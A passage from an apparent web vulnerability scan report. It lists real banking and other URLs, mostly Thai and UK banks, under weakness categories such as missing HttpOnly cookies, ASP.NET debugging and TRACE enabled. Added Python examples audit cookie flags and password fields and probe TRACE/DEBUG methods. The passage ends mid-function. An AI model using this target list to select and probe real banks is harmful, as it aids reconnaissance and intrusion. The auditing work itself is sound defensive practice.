15.28. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/13265403.stm

15.29. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/formula_one/13267766.stm

15.30. http://news.bbc.co.uk/sport2/hi/cricket/13264093.stm

15.31. http://news.bbc.co.uk/sport2/hi/football/13265403.stm

15.32. http://news.bbc.co.uk/sport2/hi/formula_one/13267766.stm

15.33. http://onlinehelp.microsoft.com/en-US/bing/ff808506.aspx

15.34. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx

15.35. http://picasaweb.google.com/lh/view

15.36. http://pixel.33across.com/ps/

15.37. http://th.linkedin.com/in/narongchai

15.38. http://translate.google.com/translate

15.39. http://translate.google.com/translate_t

15.40. http://video.google.com/videoplay

15.41. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp

15.42. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp

15.43. http://www.bangkokpost.com/forum/viewtopic.php

15.44. http://www.coolthaihouse.com/forum/viewtopic.php

15.45. http://www.facebook.com/campaign/landing.php

15.46. http://www.facebook.com/pages/KTB-Care/178373518915

15.47. http://www.google.com/finance

15.48. http://www.multimap.com/clients/places.cgi

15.49. http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php

15.50. http://www.scriptlogic.com/

15.51. http://www.scriptlogic.com/int/am/prodsel/050709

15.52. http://www.scriptlogic.com/sem/g/content/pt-wireless/070610

15.53. http://www.youtube.com/results

15.54. http://www.youtube.com/watch

15.55. http://www2.itt-tech.edu/it/d/

15.56. http://www22.glam.com/cTagsImg.act

15.57. http://xcdn.xgraph.net/15530/db/xg.gif

16. Cookie without HttpOnly flag set

16.1. https://csc.scb.co.th/webclient1/bcm_signin.jsp

16.2. https://csc.scb.co.th/webclient1/cllcntr_en.jsp

16.3. https://csc.scb.co.th/webclient1/index.jsp

16.4. http://dev.piwik.org/trac/browser/trunk/js/piwik.js

16.5. https://dimenxion.bangkokbank.com/bonprd/jsp/common/loginfiles/es.jsp

16.6. http://group.barclays.com/Citizenship/Community-Investment

16.7. http://group.barclays.com/Home

16.8. http://group.barclays.com/Sitemap

16.9. http://group.barclays.com/What-we-do/Sponsorship/Community-sponsorship

16.10. http://group.barclays.com/cs/Satellite

16.11. http://group.barclays.com/favicon.ico

16.12. https://ibank.barclays.co.uk/olb/w/LoginMember.do

16.13. https://icustody.bangkokbank.com/Signon.aspx

16.14. https://ifunds.bangkokbank.com/Login.aspx

16.15. https://kcustodian.kasikornbank.com/KCustodian/

16.16. http://m1645.ic-live.com/515/

16.17. http://marketdata.set.or.th/mkt/topten.do

16.18. http://moneytalk.scb.co.th/

16.19. http://moneytalk.scb.co.th/

16.20. http://moneytalk.scb.co.th/index.asp

16.21. http://moneytalk.scb.co.th/index.asp

16.22. https://online.kasikornbankgroup.com/K-Online/ib/login_en.jsp

16.23. https://online.kasikornbankgroup.com/K-Online/ksec/K-CyberTrade-login.jsp

16.24. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22

16.25. http://plugins.jquery.com/node/1208]

16.26. http://plugins.jquery.com/project/onImagesLoad

16.27. http://register2.set.or.th/semreg/detail.aspx

16.28. http://scb.dev-orisma.com/en/friends-of-scb

16.29. http://seal.controlcase.com/

16.30. http://th.linkedin.com/in/narongchai

16.31. http://trends.atipat.co.cc/thailand-breast-slap/x22

16.32. http://weblink.settrade.com/banner/banner3.jsp

16.33. http://wikipediareview.com/index.php

16.34. http://www.360travelguide.com/results.asp

16.35. http://www.bangkokbank.com/_layouts/NR/BangkokBankWebApps/Email%20Registration/subscribe.asp

16.36. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp

16.37. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp

16.38. http://www.bangkokbank.com/_layouts/nr/AccountAccess/account.asp

16.39. http://www.bangkokbank.com/_layouts/nr/BangkokBankWebApps/BLSresearch/MainBLS.asp

16.40. http://www.bangkokbank.com/_layouts/nr/BangkokBankWebApps/BLSresearch/MainBLS.asp

16.41. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp

16.42. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp

16.43. https://www.barclays-home-insurance.co.uk/p4/Barclays/Home/Assumptions.aspx

16.44. https://www.barclays-home-insurance.co.uk/p4/barclays/SaveRetrieve/Saveandretrieveloginpage.aspx

16.45. http://www.barclays.co.uk/Currentaccounts/P1242557963414

16.46. http://www.barclays.co.uk/Insurance/Homeinsurance/BuildingsandContentsInsurance/P1242557976121

16.47. http://www.barclays.co.uk/Insurance/P1242557963438

16.48. http://www.barclays.co.uk/Loans/P1242557963420

16.49. http://www.barclays.co.uk/Mortgages/P1242557963476

16.50. http://www.barclays.co.uk/PersonalBanking/P1242557947640

16.51. http://www.barclays.co.uk/Savings/ISAs/H1242557860616

16.52. http://www.barclays.co.uk/cs/Satellite

16.53. https://www.bizpayment.ktb.co.th/epayview/

16.54. http://www.business.barclays.co.uk/BRC1/jsp/brccontrol

16.55. http://www.controlcase.com/contact.php

16.56. http://www.controlcase.com/logon_page.php

16.57. http://www.independent.co.uk/news/world/asia/x26amp

16.58. http://www.independent.co.uk/news/world/x26amp

16.59. http://www.independent.co.uk/news/x26amp

16.60. http://www.khonkaen.com/english/forum/default.asp

16.61. http://www.khonkaen.com/english/forum/forum_posts.asp

16.62. http://www.khonkaen.com/english/forum/forum_topics.asp

16.63. http://www.ktam.co.th/en/index.php

16.64. http://www.ktb.co.th/en/main/

16.65. https://www.ktb.co.th/internetservice/onlineAccountAction.do

16.66. https://www.ktbonline.ktb.co.th/new/

16.67. http://www.mindworkscorp.com/

16.68. http://www.personal.barclays.co.uk/BRC1/jsp/brccontrol

16.69. http://www.scb.co.th/en/home

16.70. http://www.scb.co.th/en/home/

16.71. http://www.scb.co.th/scb_api/scbapi.jsp

16.72. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser

16.73. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/download

16.74. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/information

16.75. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/logon_th

16.76. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/securetip

16.77. http://www.scbeasy.com/

16.78. http://www.scriptlogic.com/sem/g/content/pt-wireless/070610

16.79. http://www.set.or.th/set/oppdaybyperiod.do

16.80. http://www.thailandhotelforums.com/forum/index.php

16.81. http://18.xg4ken.com/media/redir.php

16.82. http://419.myfunforum.org/sutra724.php/x22

16.83. http://a.unanimis.co.uk/fc.php

16.84. http://ad.yieldmanager.com/pixel

16.85. https://adwords.google.com/select/Login

16.86. https://adwords.google.com/um/StartNewLogin

16.87. http://answers.yahoo.com/dir/index

16.88. http://answers.yahoo.com/question/index

16.89. http://apps.barclays.co.uk/accessibility/

16.90. http://b.scorecardresearch.com/b

16.91. http://banner2.set.or.th/www/delivery/afr.php

16.92. http://banner2.set.or.th/www/delivery/afr.php

16.93. http://banner2.set.or.th/www/delivery/ck.php

16.94. http://banner2.set.or.th/www/delivery/lg.php

16.95. https://center.ktam.co.th/

16.96. http://cspix.media6degrees.com/orbserv/hbpix

16.97. http://dis.us.criteo.com/dis/dis.aspx

16.98. http://domdex.com/f

16.99. http://ds.addthis.com/red/psi/sites/www.set.or.th/p.json

16.100. https://ebank.kasikornbankgroup.com/kbiznet/login.html

16.101. http://edge.aperture.displaymarketplace.com/displayscript.js

16.102. https://feedback.live.com/default.aspx

16.103. http://get.adobe.com/flashplayer/

16.104. http://goto.ext.google.com/og-dogfood-issue

16.105. http://goto.ext.google.com/og-exp

16.106. http://html.aggregateknowledge.com/iframe

16.107. https://ibank.barclays.co.uk/

16.108. http://in.getclicky.com/in.php

16.109. http://ktbcare.hi5.com/

16.110. http://leadback.advertising.com/adcedge/lb

16.111. http://lvs.truehits.in.th/goggen.php

16.112. http://metrics.seenon.com/b/ss/delagentnbc,delagentglobalrollup/1/H.17/s25651625484430

16.113. http://news.bbc.co.uk/2/hi/help/rss/4498287.stm

16.114. http://news.bbc.co.uk/earth/hi/earth_news/newsid_9469000/9469456.stm

16.115. http://news.bbc.co.uk/go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm

16.116. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cricket/13264093.stm

16.117. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/13265403.stm

16.118. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/formula_one/13267766.stm

16.119. http://news.bbc.co.uk/sport2/hi/cricket/13264093.stm

16.120. http://news.bbc.co.uk/sport2/hi/football/13265403.stm

16.121. http://news.bbc.co.uk/sport2/hi/formula_one/13267766.stm

16.122. http://onlinehelp.microsoft.com/en-US/bing/ff808506.aspx

16.123. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx

16.124. http://pixel.33across.com/ps/

16.125. http://propertyforsale.kasikornbank.com/PropertyForSaleAnnouncement/1,2098,,00.html

16.126. http://scriptlogiccorp.d2.sc.omtrdc.net/b/ss/slcproduction/1/H.22.1/s27267301290655

16.127. http://sdc.bot.or.th/dcsw4pwnjm3f3ymhgt6lphzp1_5v7q/dcs.gif

16.128. http://sdc.bot.or.th/dcsw4pwnjm3f3ymhgt6lphzp1_5v7q/dcs.gif

16.129. http://statse.webtrendslive.com/dcsbkflpo00000kz4nrnh3kyv_9q5r/dcs.gif

16.130. http://statse.webtrendslive.com/dcssxcr8i00000stlemt7jpvp_8c9t/dcs.gif

16.131. http://tc.barclays.co.uk/Creditcards/P1242557963445

16.132. http://tc.barclays.co.uk/CurrentAccounts/Moreforyourmoney/AdditionsActive/P1242557963802

16.133. http://tc.barclays.co.uk/CurrentAccounts/Moreforyourmoney/CurrentAccountPlus/P1242557963790

16.134. http://tc.barclays.co.uk/Currentaccounts/P1242557963414

16.135. http://tc.barclays.co.uk/InfoBank/PersonalReserve/P1242557963784

16.136. http://tc.barclays.co.uk/Insurance/Carinsurance/Carinsurance/P1242557964058

16.137. http://tc.barclays.co.uk/Insurance/Homeinsurance/FinerHighValueHomeInsurance/P1242557964022

16.138. http://tc.barclays.co.uk/Insurance/IncomeInsurance/BarclaysIncomeInsurance/P1242570870016

16.139. http://tc.barclays.co.uk/Insurance/LifeInsurance/LifeInsurancefromAviva/P1242557963444

16.140. http://tc.barclays.co.uk/Insurance/P1242557963438

16.141. http://tc.barclays.co.uk/Loans/Ourloans/Personalloans/P1242557963928

16.142. http://tc.barclays.co.uk/Loans/P1242557963420

16.143. http://tc.barclays.co.uk/Mortgages/Fixedratemortgages/P1242557963470

16.144. http://tc.barclays.co.uk/PremierHomePage/P1242557952563

16.145. http://tc.barclays.co.uk/Savings/Comparesavingsaccounts/P1242564257686

16.146. http://tc.barclays.co.uk/Savings/FixedRateBonds/H1242557860616

16.147. http://tc.barclays.co.uk/Savings/ISAs/H1242557860616

16.148. http://tc.barclays.co.uk/Savings/P1242557963426

16.149. http://tc.barclays.co.uk/c

16.150. http://tc.barclays.co.uk/i

16.151. http://translate.google.com/translate

16.152. http://translate.google.com/translate_t

16.153. http://twitter.com/KBank_Live

16.154. http://twitter.com/ktb_care

16.155. http://twitter.com/scb_thailand

16.156. http://video.google.com/videoplay

16.157. http://webmail.aol.com/

16.158. http://www.barclays.com/privacy/com_privacy.html

16.159. https://www.bizpayment.ktb.co.th/epayview

16.160. http://www.facebook.com/pages/KTB-Care/178373518915

16.161. http://www.google.com/finance

16.162. https://www.google.com/accounts/Login

16.163. https://www.google.com/accounts/ServiceLogin

16.164. http://www.googleadservices.com/pagead/aclk

16.165. http://www.googleadservices.com/pagead/conversion/1005090170/

16.166. http://www.googleadservices.com/pagead/conversion/1032234781/

16.167. http://www.multimap.com/clients/places.cgi

16.168. http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php

16.169. https://www.newcb.ktb.co.th/

16.170. http://www.scriptlogic.com/

16.171. http://www.scriptlogic.com/int/am/prodsel/050709

16.172. http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp

16.173. http://www.yestheyrefake.net/vb/forumdisplay.php

16.174. http://www.yestheyrefake.net/vb/showthread.php

16.175. http://www.youtube.com/results

16.176. http://www.youtube.com/watch

16.177. http://www.zlmc.org/mindfulness-meditation.html

16.178. http://www2.itt-tech.edu/it/d/

16.179. http://www22.glam.com/cTagsImg.act

16.180. http://xcdn.xgraph.net/15530/db/xg.gif
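
The check behind every item in category 16, as an added example that is not part of the XSS.CX report or of the scanner that produced it: parse each Set-Cookie value into its name and attribute flags and report cookies that lack HttpOnly (and, for HTTPS origins, Secure). The header values are constructed for the example and are not cookies captured from any host listed above.

```python
from typing import Dict, List

# Constructed Set-Cookie values; none of these were captured from hosts in the report.
SAMPLE_SET_COOKIE_HEADERS = [
    "session=0000abc123; Path=/app; Secure",
    "lb_node=node1; Path=/",
    "lang=en; Path=/; HttpOnly",
    "sid=9f8e7d; Path=/; Secure; HttpOnly; SameSite=Lax",
]


def parse_set_cookie(header_value: str) -> Dict[str, object]:
    """Split one Set-Cookie value into the cookie name and a dict of its attributes.

    Attribute names are lower-cased; flag attributes without a value map to True.
    """
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs: Dict[str, object] = {}
    for attr in parts[1:]:
        if "=" in attr:
            key, value = attr.split("=", 1)
            attrs[key.strip().lower()] = value.strip()
        elif attr:
            attrs[attr.lower()] = True
    return {"name": name, "attrs": attrs}


def missing_flags(header_value: str, over_https: bool = True) -> List[str]:
    """Return the protective flags this cookie lacks.

    Secure is only reported for cookies set over HTTPS; on a plain-HTTP
    response the browser would ignore it anyway.
    """
    attrs = parse_set_cookie(header_value)["attrs"]
    missing = []
    if "httponly" not in attrs:
        missing.append("HttpOnly")
    if over_https and "secure" not in attrs:
        missing.append("Secure")
    return missing


def audit_cookies(headers: List[str], over_https: bool = True) -> Dict[str, List[str]]:
    """Map each cookie name to the flags it is missing; cookies with no finding are omitted."""
    findings: Dict[str, List[str]] = {}
    for header in headers:
        name = parse_set_cookie(header)["name"]
        missing = missing_flags(header, over_https)
        if missing:
            findings[name] = missing
    return findings


if __name__ == "__main__":
    for cookie, flags in audit_cookies(SAMPLE_SET_COOKIE_HEADERS).items():
        print(f"{cookie}: missing {', '.join(flags)}")
```

HttpOnly only stops script from reading the cookie through document.cookie; a reflected XSS on the same origin can still drive authenticated requests with the cookie attached, so this flag reduces the impact of the XSS findings in this report rather than removing it.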

17. Password field with autocomplete enabled

17.1. http://dl.scriptlogic.com/login/Combined.aspx

17.2. http://home.controlcase.com/piwik/

17.3. https://home.controlcase.com/piwik/

17.4. https://online.kasikornbankgroup.com/K-Online/ksec/K-CyberTrade-login.jsp

17.5. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22

17.6. http://th.linkedin.com/in/narongchai

17.7. http://truehits.net/

17.8. http://truehits.net/stat.php

17.9. http://twitter.com/KBank_Live

17.10. http://twitter.com/ktb_care

17.11. http://twitter.com/scb_thailand

17.12. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London

17.13. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London

17.14. http://wikipediareview.com/index.php

17.15. http://wikipediareview.com/index.php

17.16. https://www.barclaysfantasyfundmanager.co.uk/

17.17. https://www.bizpayment.ktb.co.th/epayview/

17.18. http://www.controlcase.com/change_password.php

17.19. http://www.controlcase.com/logon_page.php

17.20. http://www.facebook.com/pages/KTB-Care/178373518915

17.21. https://www.google.com/accounts/Login

17.22. https://www.google.com/accounts/ServiceLogin

17.23. http://www.khonkaen.com/english/forum/default.asp

17.24. https://www.ktamsmarttrade.com/FrontWeb/Home/Login.aspx

17.25. http://www.newsroom.barclays.com/webuser/newsextra.aspx

17.26. http://www.newsroom.barclays.com/webuser/register.aspx

17.27. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser

17.28. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/download

17.29. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/information

17.30. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/logon_th

17.31. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/securetip

17.32. http://www.thailandhotelforums.com/forum/index.php

17.33. http://www.thailandhotelforums.com/forum/index.php

17.34. http://www.yestheyrefake.net/vb/forumdisplay.php

17.35. http://www.yestheyrefake.net/vb/showthread.php
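
The check behind category 17, as an added example rather than the scanner's own logic: walk the HTML with the standard-library parser and report every password input that neither carries autocomplete="off" itself nor sits inside a form that does. The markup is constructed for the example and is not taken from any page listed above.

```python
from html.parser import HTMLParser
from typing import Dict, List, Optional

# Constructed login and registration forms; not markup from any site in the report.
SAMPLE_HTML = """
<form action="/logon" method="post" autocomplete="off">
  <input type="text" name="user">
  <input type="password" name="pass">
</form>
<form action="/register" method="post">
  <input type="password" name="pw1">
  <input type="PASSWORD" name="pw2" autocomplete="off">
</form>
"""


class PasswordFieldAuditor(HTMLParser):
    """Collect password inputs that are not covered by autocomplete="off".

    A field is covered if it sets the attribute itself or if the nearest
    enclosing <form> sets it.
    """

    def __init__(self) -> None:
        super().__init__()
        self.form_stack: List[bool] = []      # True when that <form> has autocomplete="off"
        self.findings: List[Dict[str, Optional[str]]] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self.form_stack.append(a.get("autocomplete", "").lower() == "off")
        elif tag == "input" and a.get("type", "text").lower() == "password":
            form_off = self.form_stack[-1] if self.form_stack else False
            field_off = a.get("autocomplete", "").lower() == "off"
            if not (form_off or field_off):
                self.findings.append({"name": a.get("name"), "autocomplete": a.get("autocomplete")})

    def handle_endtag(self, tag: str) -> None:
        if tag == "form" and self.form_stack:
            self.form_stack.pop()


def find_autocomplete_password_fields(html: str) -> List[str]:
    """Return the names of password fields the browser is allowed to autocomplete."""
    auditor = PasswordFieldAuditor()
    auditor.feed(html)
    auditor.close()
    return [f["name"] or "<unnamed>" for f in auditor.findings]


if __name__ == "__main__":
    print(find_autocomplete_password_fields(SAMPLE_HTML))
```

Treat this category as low severity today: current browsers ignore autocomplete="off" on password fields so that password managers keep working, so the attribute no longer prevents credential storage and the finding is mainly a record of the site's intent.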

18. Source code disclosure

18.1. http://www.ktb.co.th/flash/a2.swf

18.2. http://www.ktb.co.th/flash/a3.swf

18.3. http://www.ktb.co.th/flash/c3.swf

18.4. http://www.ktb.co.th/flash/d2.swf

18.5. http://www.ktb.co.th/flash/d3.swf

18.6. http://www.ktb.co.th/flash/e3.swf

18.7. http://www.ktb.co.th/flash/f2.swf

18.8. http://www.ktb.co.th/flash/home_show_flash2.swf

18.9. http://www.ktb.co.th/flash/ktb_group_eng.swf

19. ASP.NET debugging enabled

19.1. http://dl.scriptlogic.com/Default.aspx

19.2. http://register2.set.or.th/Default.aspx

19.3. http://www.bot.or.th/Default.aspx

19.4. https://www.ktamsmarttrade.com/Default.aspx

20. Referer-dependent response

20.1. http://weblink.settrade.com/banner/banner3.jsp

20.2. http://www.facebook.com/plugins/like.php

20.3. http://www.scriptlogic.com/sem/g/content/pt-wireless/070610

20.4. http://www2.itt-tech.edu/it/d/

21. Cross-domain POST

21.1. http://jscrollpane.kelvinluck.com/

21.2. http://webcache.googleusercontent.com/search

21.3. http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp

22. Cross-domain Referer leakage

22.1. http://0.r.msn.com/

22.2. http://318395.r.msn.com/

22.3. http://914188.r.msn.com/

22.4. http://ad.doubleclick.net/adi/agt.nbcuni/homepage

22.5. http://ad.doubleclick.net/adi/agt.nbcuni/homepage

22.6. http://ad.doubleclick.net/adi/agt.nbcuni/homepage

22.7. http://ad.doubleclick.net/adi/agt.nbcuni/homepage

22.8. http://answers.yahoo.com/dir/index

22.9. http://answers.yahoo.com/question/index

22.10. http://dl.scriptlogic.com/login/Combined.aspx

22.11. http://get.adobe.com/flashplayer/

22.12. http://googleads.g.doubleclick.net/pagead/ads

22.13. http://googleads.g.doubleclick.net/pagead/ads

22.14. http://googleads.g.doubleclick.net/pagead/ads

22.15. http://googleads.g.doubleclick.net/pagead/ads

22.16. http://googleads.g.doubleclick.net/pagead/ads

22.17. http://marketdata.set.or.th/mkt/topten.do

22.18. http://moneytalk.scb.co.th/index.asp

22.19. http://news.google.com/news/story

22.20. http://picasaweb.google.com/lh/view

22.21. http://picasaweb.google.com/lh/view

22.22. http://rtradeinfo.bualuang.co.th/tradinginfo.services/price_update.php

22.23. http://translate.google.com/translate_t

22.24. http://translate.google.com/translate_t

22.25. http://truehits.net/stat.php

22.26. http://webcache.googleusercontent.com/search

22.27. http://webcache.googleusercontent.com/search

22.28. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp

22.29. http://www.barclays.co.uk/Savings/ISAs/H1242557860616

22.30. http://www.facebook.com/plugins/like.php

22.31. http://www.facebook.com/plugins/like.php

22.32. http://www.google.com/recaptcha/api/js/recaptcha_ajax.js

22.33. http://www.google.com/search

22.34. http://www.google.com/search

22.35. http://www.google.com/search

22.36. http://www.google.com/search

22.37. http://www.google.com/url

22.38. http://www.google.com/url

22.39. http://www.googleadservices.com/pagead/conversion/1032234781/

22.40. http://www.kasikornbank.com/Pages/truehitsstat.html

22.41. http://www.ktam.co.th/media_box.php

22.42. http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php

22.43. http://www.newsroom.barclays.com/content/Detail.aspx

22.44. http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp

22.45. http://www.sedoparking.com/search/registrar.php

22.46. http://www.set.or.th/set/oppdaybyperiod.do

22.47. http://www.zlmc.org/mindfulness-meditation.html

22.48. http://www2.itt-tech.edu/it/d/

23. Cross-domain script include

23.1. http://adomas.org/javascript-mouse-wheel/

23.2. http://answers.yahoo.com/dir/index

23.3. http://answers.yahoo.com/dir/index

23.4. http://answers.yahoo.com/question/index

23.5. https://apps.barclays.co.uk/webchat/invite_accept.jpg/u0022

23.6. https://apps.barclays.co.uk/webchat/invite_background.jpg/u0022

23.7. https://apps.barclays.co.uk/webchat/invite_decline_bottom.jpg/u0022

23.8. http://de.wikipedia.org/wiki/Liste_der_Banken_in_Thailand

23.9. http://dl.scriptlogic.com/login/Combined.aspx

23.10. http://docs.jquery.com/UI

23.11. http://docs.jquery.com/UI/Accordion

23.12. http://docs.jquery.com/UI/Button

23.13. http://docs.jquery.com/UI/Effects/

23.14. http://docs.jquery.com/UI/Effects/Slide

23.15. http://docs.jquery.com/UI/Mouse

23.16. http://docs.jquery.com/UI/Slider

23.17. http://docs.jquery.com/UI/Widget

23.18. http://en.wikipedia.org/wiki/List_of_banks_in_Thailand

23.19. http://googleads.g.doubleclick.net/pagead/ads

23.20. http://group.barclays.com/Citizenship/Community-Investment

23.21. http://group.barclays.com/What-we-do/Sponsorship/Community-sponsorship

23.22. http://group.barclays.com/favicon.ico

23.23. http://img.sedoparking.com/jspartner/google.js

23.24. http://ipinfusion.com/js/header.js

23.25. http://ja.wikipedia.org/wiki/????????覧

23.26. http://javascript.nwbox.com/IEContentLoaded/

23.27. http://jquery.com/

23.28. http://jqueryui.com/about

23.29. http://jscrollpane.kelvinluck.com/

23.30. http://marketdata.set.or.th/mkt/topten.do

23.31. http://marketdata.set.or.th/search.html

23.32. http://nerdbots.com/services.html

23.33. http://news.bbc.co.uk/earth/hi/earth_news/newsid_9469000/9469456.stm

23.34. http://news.bbc.co.uk/sport2/hi/cricket/13264093.stm

23.35. http://news.bbc.co.uk/sport2/hi/football/13265403.stm

23.36. http://news.bbc.co.uk/sport2/hi/formula_one/13267766.stm

23.37. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22

23.38. http://picasaweb.google.com/lh/view

23.39. http://randomfactsthailand.com/thailand-breast-slap-sudden-breast-growth-without-surgery/x22

23.40. http://sorgalla.com/

23.41. http://sorgalla.com/jcarousel/

23.42. http://th.wikipedia.org/wiki/รายชื่อธนาคารในประเทศไทย

23.43. http://translatewiki.net/wiki/MediaWiki:Collapsible-collapse/en

23.44. http://translatewiki.net/wiki/MediaWiki:Collapsible-expand/en

23.45. http://trends.atipat.co.cc/thailand-breast-slap/x22

23.46. http://truehits.net/

23.47. http://truehits.net/stat.php

23.48. http://tv.popcrunch.com/snl-commercials-barkleys-bank-peepers-insurance-video/

23.49. http://twitter.com/KBank_Live

23.50. http://twitter.com/ktb_care

23.51. http://twitter.com/scb_thailand

23.52. http://webcache.googleusercontent.com/search

23.53. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London

23.54. http://wikimediafoundation.org/wiki/Privacy_policy

23.55. http://wikimediafoundation.org/wiki/Terms_of_Use

23.56. http://wuu.wikipedia.org/wiki/泰???

23.57. http://www.360travelguide.com/results.asp

23.58. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp

23.59. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp

23.60. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp

23.61. http://www.bangkokpost.com/forum/viewtopic.php

23.62. https://www.barclays-home-insurance.co.uk/p4/Barclays/Home/Assumptions.aspx

23.63. http://www.barclaysannualreports.com/ar2010/index.asp

23.64. http://www.bot.or.th/english/Pages/BOTDefault.aspx

23.65. http://www.coolthaihouse.com/forum/viewtopic.php

23.66. http://www.facebook.com/pages/KTB-Care/178373518915

23.67. http://www.facebook.com/plugins/like.php

23.68. http://www.independent.co.uk/news/world/asia/x26amp

23.69. http://www.independent.co.uk/news/world/x26amp

23.70. http://www.independent.co.uk/news/x26amp

23.71. http://www.kasikornbank.com/Pages/truehitsstat.html

23.72. http://www.khonkaen.com/english/forum/default.asp

23.73. http://www.ktb.co.th/en/ktb_group/main.jsp

23.74. http://www.ktb.co.th/en/main/

23.75. http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php

23.76. http://www.newsroom.barclays.com/content/Detail.aspx

23.77. http://www.scb.co.th/en/home

23.78. http://www.scb.co.th/en/home/

23.79. http://www.scriptlogic.com/

23.80. http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp

23.81. http://www.sedoparking.com/search/registrar.php

23.82. http://www.set.or.th/en/contact/contact.html

23.83. http://www.set.or.th/en/index.html

23.84. http://www.set.or.th/en/news/issuer_activities/ipo_showcase/set_ipo_showcase_p1.html

23.85. http://www.set.or.th/en/products/index/setindex_p1.html

23.86. http://www.set.or.th/en/regulations/cg/roles_p1.html

23.87. http://www.set.or.th/en/sitemap/for_listing.html

23.88. http://www.set.or.th/nicepage_404.html

23.89. http://www.set.or.th/search.html

23.90. http://www.set.or.th/set/oppdaybyperiod.do

23.91. http://www.set.or.th/th/index.html

23.92. http://www.thailandhotelforums.com/forum/index.php

23.93. http://www.youtube.com/results

23.94. http://www2.itt-tech.edu/it/d/

24. File upload functionality

25. TRACE method is enabled

25.1. http://18.xg4ken.com/

25.2. http://2-thai.com/

25.3. http://a.unanimis.co.uk/

25.4. http://de.wikipedia.org/

25.5. http://en.wikipedia.org/

25.6. http://formlessnetworking.com/

25.7. http://home.controlcase.com/

25.8. https://home.controlcase.com/

25.9. http://ipinfusion.com/

25.10. http://ja.wikipedia.org/

25.11. http://javascript.nwbox.com/

25.12. http://jquery.com/

25.13. http://jquery.org/

25.14. https://ksupplychain.kasikornbank.com/

25.15. http://meta.wikimedia.org/

25.16. http://metrics.seenon.com/

25.17. http://mls.marchex.com/

25.18. https://online.kasikornbankgroup.com/

25.19. http://picasaweb.google.com/

25.20. http://piwik.org/

25.21. http://plugins.jquery.com/

25.22. http://register2.set.or.th/

25.23. http://rtradeinfo.bualuang.co.th/

25.24. http://scriptlogiccorp.d2.sc.omtrdc.net/

25.25. https://secure.wikimedia.org/

25.26. http://sizzlejs.com/

25.27. http://th.wikipedia.org/

25.28. http://thailandforvisitors.com/

25.29. http://trends.atipat.co.cc/

25.30. http://validator.w3.org/

25.31. http://wiki.answers.com/

25.32. http://wikimediafoundation.org/

25.33. http://wuu.wikipedia.org/

25.34. http://www.1day1year.com/

25.35. http://www.bangkokpost.com/

25.36. http://www.coolthaihouse.com/

25.37. http://www.formlessnetworking.com/

25.38. http://www.ktam.co.th/

25.39. http://www.thailandguru.com/

25.40. http://www.thailandhotelforums.com/

25.41. http://www2.itt-tech.edu/
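
One way to reproduce the checks behind categories 19 (ASP.NET debugging enabled) and 25 (TRACE method is enabled), added here as an example and not part of the report or its scanner: build a raw HTTP/1.1 request with a non-standard method, then classify the reply. TRACE is considered enabled when the server answers 200 with a message/http body that echoes our request line; ASP.NET reports debugging enabled when a DEBUG request carrying a Command: stop-debug header gets 200 with the body OK. The sample responses are constructed so the classifier runs offline; example.test is a placeholder host, and send_raw is provided for live use but is not exercised here.

```python
import socket
import ssl
from typing import Dict, Optional, Tuple


def build_request(method: str, host: str, path: str = "/",
                  extra: Optional[Dict[str, str]] = None) -> bytes:
    """Serialize a minimal HTTP/1.1 request; the method is sent verbatim."""
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}", "Connection: close"]
    for key, value in (extra or {}).items():
        lines.append(f"{key}: {value}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def parse_response(raw: bytes) -> Tuple[int, Dict[str, str], bytes]:
    """Split a raw response into (status code, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    headers: Dict[str, str] = {}
    for line in header_lines:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return status, headers, body


def trace_enabled(request: bytes, raw_response: bytes) -> bool:
    """TRACE is on when the server reflects the request back as message/http."""
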